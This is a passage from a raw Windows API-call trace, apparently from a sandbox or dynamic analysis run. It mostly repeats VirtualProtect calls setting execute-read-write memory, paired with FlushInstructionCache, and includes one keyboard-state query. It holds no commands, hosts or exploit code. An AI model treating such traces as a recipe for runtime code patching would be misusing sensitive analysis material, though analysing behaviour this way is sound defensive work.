(hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.733] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.734] GetCurrentProcess () returned 0xffffffff [0095.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.734] GetCurrentProcess () returned 0xffffffff [0095.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.734] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.735] GetCurrentProcess () returned 0xffffffff [0095.735] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.735] GetCurrentProcess () returned 0xffffffff [0095.735] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.735] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.735] GetCurrentProcess () returned 0xffffffff [0095.735] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.735] GetCurrentProcess () returned 0xffffffff [0095.735] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.736] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.736] GetCurrentProcess () returned 0xffffffff [0095.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.736] GetCurrentProcess () returned 0xffffffff [0095.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.736] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.737] GetCurrentProcess () returned 0xffffffff [0095.737] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.737] GetCurrentProcess () returned 0xffffffff [0095.737] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.737] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.737] GetCurrentProcess () returned 0xffffffff [0095.737] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.737] GetCurrentProcess () returned 0xffffffff [0095.737] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.737] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.738] GetCurrentProcess () returned 0xffffffff [0095.738] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.738] GetCurrentProcess () returned 0xffffffff [0095.738] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.738] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.738] GetCurrentProcess () returned 0xffffffff [0095.738] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.738] GetCurrentProcess () returned 0xffffffff [0095.738] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.738] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.740] GetCurrentProcess () returned 0xffffffff [0095.740] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.740] GetCurrentProcess () returned 0xffffffff [0095.740] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.740] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.740] GetCurrentProcess () returned 0xffffffff [0095.740] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.740] GetCurrentProcess () returned 0xffffffff [0095.740] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.741] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.741] GetCurrentProcess () returned 0xffffffff [0095.741] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.741] GetCurrentProcess () returned 0xffffffff [0095.741] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.741] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.742] GetCurrentProcess () returned 0xffffffff [0095.742] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.742] GetCurrentProcess () returned 0xffffffff [0095.742] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.742] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.743] GetCurrentProcess () returned 0xffffffff [0095.743] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.743] GetCurrentProcess () returned 0xffffffff [0095.743] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.743] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.744] GetCurrentProcess () returned 0xffffffff [0095.744] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.744] GetCurrentProcess () returned 0xffffffff [0095.744] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.744] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.745] GetCurrentProcess () returned 0xffffffff [0095.745] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.745] GetCurrentProcess () returned 0xffffffff [0095.745] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.745] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.746] GetCurrentProcess () returned 0xffffffff [0095.746] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.746] GetCurrentProcess () returned 0xffffffff [0095.746] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.746] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.747] GetCurrentProcess () returned 0xffffffff [0095.747] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.747] GetCurrentProcess () returned 0xffffffff [0095.747] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.747] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.747] GetCurrentProcess () returned 0xffffffff [0095.747] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.747] GetCurrentProcess () returned 0xffffffff [0095.748] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.748] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.748] GetCurrentProcess () returned 0xffffffff [0095.748] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.748] GetCurrentProcess () returned 0xffffffff [0095.748] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.748] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.749] GetCurrentProcess () returned 0xffffffff [0095.749] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.749] GetCurrentProcess () returned 0xffffffff [0095.749] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.749] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.750] GetCurrentProcess () returned 0xffffffff [0095.750] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.750] GetCurrentProcess () returned 0xffffffff [0095.750] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.750] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.751] GetCurrentProcess () returned 0xffffffff [0095.751] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.751] GetCurrentProcess () returned 0xffffffff [0095.751] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.751] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.751] GetCurrentProcess () returned 0xffffffff [0095.751] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.751] GetCurrentProcess () returned 0xffffffff [0095.751] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.752] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.752] GetCurrentProcess () returned 0xffffffff [0095.752] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.752] GetCurrentProcess () returned 0xffffffff [0095.752] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.752] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.753] GetCurrentProcess () returned 0xffffffff [0095.753] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.753] GetCurrentProcess () returned 0xffffffff [0095.753] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.753] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.754] GetCurrentProcess () returned 0xffffffff [0095.754] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.754] GetCurrentProcess () returned 0xffffffff [0095.754] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.754] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.755] GetCurrentProcess () returned 0xffffffff [0095.755] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.756] GetAsyncKeyState (vKey=3) returned 0 [0095.756] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.756] CRetailMalloc_Alloc () returned 0xf52f488 [0095.756] memcpy (in: _Dst=0xb2a5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.756] memcpy (in: _Dst=0xf52f4a8, _Src=0x197724, _Size=0x18 | out: _Dst=0xf52f4a8) returned 0xf52f4a8 [0095.756] CRetailMalloc_Realloc () returned 0xf52f488 [0095.756] CRetailMalloc_Free () returned 0x1 [0095.756] GetCurrentProcess () returned 0xffffffff [0095.756] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.756] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.757] GetCurrentProcess () returned 0xffffffff [0095.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.757] GetCurrentProcess () returned 0xffffffff [0095.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.757] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.760] GetCurrentProcess () returned 0xffffffff [0095.760] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.760] GetCurrentProcess () returned 0xffffffff [0095.760] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.760] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.761] GetCurrentProcess () returned 0xffffffff [0095.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.761] GetCurrentProcess () returned 0xffffffff [0095.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.761] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.761] GetCurrentProcess () returned 0xffffffff [0095.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.761] GetCurrentProcess () returned 0xffffffff [0095.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.762] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.762] GetCurrentProcess () returned 0xffffffff [0095.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.762] GetCurrentProcess () returned 0xffffffff [0095.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.762] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.763] GetCurrentProcess () returned 0xffffffff [0095.763] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.763] GetCurrentProcess () returned 0xffffffff [0095.763] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.763] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.764] GetCurrentProcess () returned 0xffffffff [0095.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.764] GetCurrentProcess () returned 0xffffffff [0095.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.764] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.765] GetCurrentProcess () returned 0xffffffff [0095.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.765] GetCurrentProcess () returned 0xffffffff [0095.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.765] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.765] GetCurrentProcess () returned 0xffffffff [0095.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.765] GetCurrentProcess () returned 0xffffffff [0095.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.765] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.766] GetCurrentProcess () returned 0xffffffff [0095.766] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.766] GetCurrentProcess () returned 0xffffffff [0095.766] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.766] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.767] GetCurrentProcess () returned 0xffffffff [0095.767] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.767] GetCurrentProcess () returned 0xffffffff [0095.767] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.767] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.768] GetCurrentProcess () returned 0xffffffff [0095.768] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.768] GetCurrentProcess () returned 0xffffffff [0095.768] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.768] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.768] GetCurrentProcess () returned 0xffffffff [0095.768] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.768] GetCurrentProcess () returned 0xffffffff [0095.768] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.769] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.769] GetCurrentProcess () returned 0xffffffff [0095.769] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.769] GetCurrentProcess () returned 0xffffffff [0095.769] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.769] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.770] GetCurrentProcess () returned 0xffffffff [0095.770] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.770] GetCurrentProcess () returned 0xffffffff [0095.770] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.770] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.771] GetCurrentProcess () returned 0xffffffff [0095.771] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.771] GetCurrentProcess () returned 0xffffffff [0095.771] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.771] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.771] GetCurrentProcess () returned 0xffffffff [0095.771] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.772] GetCurrentProcess () returned 0xffffffff [0095.772] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.772] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.772] GetCurrentProcess () returned 0xffffffff [0095.772] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.772] GetCurrentProcess () returned 0xffffffff [0095.772] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.772] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.773] GetCurrentProcess () returned 0xffffffff [0095.773] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.773] GetCurrentProcess () returned 0xffffffff [0095.773] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.773] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.774] GetCurrentProcess () returned 0xffffffff [0095.774] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.774] GetCurrentProcess () returned 0xffffffff [0095.774] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.774] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.775] GetCurrentProcess () returned 0xffffffff [0095.775] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.775] GetCurrentProcess () returned 0xffffffff [0095.775] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.775] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.776] GetCurrentProcess () returned 0xffffffff [0095.776] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.776] GetCurrentProcess () returned 0xffffffff [0095.776] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.776] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.776] GetCurrentProcess () returned 0xffffffff [0095.776] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.776] GetCurrentProcess () returned 0xffffffff [0095.776] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.777] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.777] GetCurrentProcess () returned 0xffffffff [0095.777] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.777] GetCurrentProcess () returned 0xffffffff [0095.777] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.777] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.778] GetCurrentProcess () returned 0xffffffff [0095.778] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.778] GetCurrentProcess () returned 0xffffffff [0095.778] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.778] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.779] GetCurrentProcess () returned 0xffffffff [0095.779] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.779] GetCurrentProcess () returned 0xffffffff [0095.779] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.779] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.780] GetCurrentProcess () returned 0xffffffff [0095.780] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.780] GetCurrentProcess () returned 0xffffffff [0095.780] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.780] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.780] GetCurrentProcess () returned 0xffffffff [0095.780] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.780] GetCurrentProcess () returned 0xffffffff [0095.780] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.780] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.781] GetCurrentProcess () returned 0xffffffff [0095.781] FlushInstructionCache 